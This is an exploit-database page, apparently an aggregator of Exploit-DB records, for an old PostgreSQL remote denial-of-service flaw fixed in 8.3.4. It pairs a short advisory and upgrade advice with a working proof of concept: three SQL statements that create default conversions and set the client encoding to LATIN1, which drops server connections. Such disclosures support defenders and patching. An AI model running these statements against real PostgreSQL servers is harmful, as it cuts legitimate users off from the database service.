header-logo
Suggest Exploit
vendor:
PostgreSQL
by:
SecurityFocus
7.5
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: PostgreSQL
Affected Version From: All versions prior to 8.3.4
Affected Version To: 8.3.2004
Patch Exists: YES
Related CWE: N/A
CPE: postgresql
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PostgreSQL Remote Denial-of-Service Vulnerability

PostgreSQL is prone to a remote denial-of-service vulnerability. Exploiting this issue may allow attackers to terminate connections to the PostgreSQL server, denying service to legitimate users. An attacker can exploit this issue by creating two default conversions and then setting the client encoding to 'LATIN1'. This will cause an invalid byte sequence error and terminate the connection.

Mitigation:

Administrators are advised to upgrade to the latest version of PostgreSQL.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34090/info

PostgreSQL is prone to a remote denial-of-service vulnerability.

Exploiting this issue may allow attackers to terminate connections to the PostgreSQL server, denying service to legitimate users.

test=# CREATE DEFAULT CONVERSION test1 FOR 'LATIN1' TO 'KOI8' FROM
ascii_to_mic;
CREATE CONVERSION
test=# CREATE DEFAULT CONVERSION test2 FOR 'KOI8' TO 'LATIN1' FROM
mic_to_ascii;
CREATE CONVERSION
test=# set client_encoding to 'LATIN1';

Navigation

Suggest Exploit

Services By CQR